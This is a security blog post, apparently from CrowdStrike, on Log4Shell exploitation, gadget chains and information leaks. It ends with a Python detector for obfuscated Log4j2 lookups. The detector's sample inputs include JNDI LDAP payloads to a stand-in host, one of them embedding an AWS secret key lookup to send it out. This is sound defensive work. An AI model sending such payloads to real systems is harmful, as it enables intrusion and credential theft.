CrowdStrike has identified a malicious Java class file hosted on infrastructure associated with a nation-state adversary. The Java code is used to download known instances of adversary-specific tooling and is likely to be used in conjunction with the recently disclosed Log4Shell exploit (CVE-2021-44228).

Apache has released version 2.16.0, which completely removes support for Message Lookups and disables JNDI by default.

Additional countermeasures for the Log4j2 vulnerability can be activated to prevent the execution of Java classes whose class names are not included in an allowlist, which effectively raises the bar for attackers to deliver and run their own code. In response, attackers are currently working on more complex exploitation scenarios to bypass these restrictions.

One common strategy is to provide a serialized payload that exploits a deserialization vulnerability, making use of Java code gadgets that are already present on the class path and are therefore trusted. This concept is implemented in the open-source JNDI-Exploit-Kit.

Because malicious serialized objects, so-called “gadget chains,” must be tailored to a specific target, attackers frequently leverage information leaks to learn about a host. By passing specially crafted input with nested variables to Log4j2, an attacker can leak sensitive system information that can then be used to construct a gadget chain for that host. [1] CrowdStrike is currently unaware of a reliable method to construct a Log4Shell exploit that applies to all potentially vulnerable products.

Information surrounding the vulnerability, impacted products and in-the-wild exploitation is continuing to evolve, and CrowdStrike will update this blog as new information becomes available.
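The nested-variable information leak described above is easy to miss in raw request logs, because in-the-wild payloads split the `jndi` prefix across lookups that Log4j2 evaluates to plain text (`${lower:J}`, `${upper:n}`, the `${...:-default}` fallback) before the outer lookup is resolved. The following is an added example, written for this post and not part of CrowdStrike's tooling or the JNDI-Exploit-Kit: it re-implements just enough of Log4j2's innermost-first `${...}` substitution to normalize such strings, lists every lookup found, and flags a JNDI lookup that carries a host-information lookup (`env`, `sys`, `java`, `hostName`, ...) inside its URL. The lookup prefix names are real Log4j2 lookups; the sample inputs, the IP address and the function names are constructed for the example.

```python
"""Normalize obfuscated Log4j2 lookup strings and flag JNDI / info-leak use.

Added example for this post (not CrowdStrike's or JNDI-Exploit-Kit's code).
Only the obfuscation lookups (lower, upper, ${...:-default}) are evaluated;
everything else is left as a placeholder so the analyst can see what the
attacker asked Log4j2 to resolve. Sample inputs below are constructed.
"""
from dataclasses import dataclass, field

# Real Log4j2 lookup prefixes whose value reveals something about the host.
LEAKS = {"env", "sys", "java", "hostname", "main", "ctx", "log4j",
         "docker", "k8s", "spring", "bundle", "date"}


@dataclass
class Finding:
    normalized: str
    lookups: list = field(default_factory=list)  # every lookup seen, as "prefix:key"

    @property
    def jndi(self) -> bool:
        return any(l.startswith("jndi:") for l in self.lookups)

    @property
    def leaks(self) -> list:
        return [l for l in self.lookups if l.split(":", 1)[0] in LEAKS]

    @property
    def exfiltration(self) -> bool:
        # A host-information lookup combined with a JNDI lookup: the leaked
        # value is sent to the attacker's server as part of the JNDI URL.
        return self.jndi and bool(self.leaks)


def _evaluate(inner: str, lookups: list) -> str:
    """Resolve one ${...} body whose nested lookups are already expanded."""
    body, sep, default = inner.partition(":-")   # ${prefix:key:-default}
    prefix, _, key = body.partition(":")
    prefix = prefix.lower()                      # Log4j2 matches prefixes case-insensitively
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    if prefix == "":                             # ${::-x}: no lookup, only the default
        return default if sep else "${" + inner + "}"
    lookups.append(prefix + ":" + key)
    if prefix == "jndi":
        return "${jndi:" + key + "}"
    # Value unknown at analysis time: show the fallback Log4j2 would use when the
    # key is unset (attackers rely on this for obfuscation), else keep a placeholder.
    return default if sep else "${" + body + "}"


def _parse(s: str, i: int, depth: int, lookups: list):
    """Substitute innermost lookups first; returns (text, next_index, closed)."""
    out = []
    while i < len(s):
        if s.startswith("${", i):
            inner, i, closed = _parse(s, i + 2, depth + 1, lookups)
            out.append(_evaluate(inner, lookups) if closed else "${" + inner)
        elif s[i] == "}" and depth > 0:
            return "".join(out), i + 1, True
        else:
            out.append(s[i])
            i += 1
    return "".join(out), i, False                # unterminated lookup stays literal


def analyze(text: str) -> Finding:
    """Normalize one log field (header, URL, form value) and report its lookups."""
    lookups: list = []
    normalized, _, _ = _parse(text, 0, 0, lookups)
    return Finding(normalized, lookups)


if __name__ == "__main__":
    # Constructed sample User-Agent values; 198.51.100.7 is a documentation address.
    samples = [
        "Mozilla/5.0 (X11; Linux x86_64)",
        "${jndi:ldap://198.51.100.7:1389/a}",
        "${${lower:j}${upper:n}${::-d}i:${lower:LDAP}://198.51.100.7/"
        "${env:AWS_SECRET_ACCESS_KEY}}",
        "${${env:NaN:-j}ndi:ldap://198.51.100.7/${sys:user.name}.${java:version}}",
    ]
    for s in samples:
        f = analyze(s)
        print(f"{f.normalized!r}\n  jndi={f.jndi} leaks={f.leaks} "
              f"exfiltration={f.exfiltration}")
```

Run it over the fields you log from untrusted input (User-Agent, X-Forwarded-For, URL query values) and alert on `Finding.jndi`; `Finding.exfiltration` separates reconnaissance of the kind described above from a plain callback probe. Note that the `${env:NaN:-j}` obfuscation trick is itself an `env` lookup, so it is counted as a leak even though the attacker only wants its fallback value; treat the `leaks` list as a list of what Log4j2 was asked to resolve, not as proof that a secret existed.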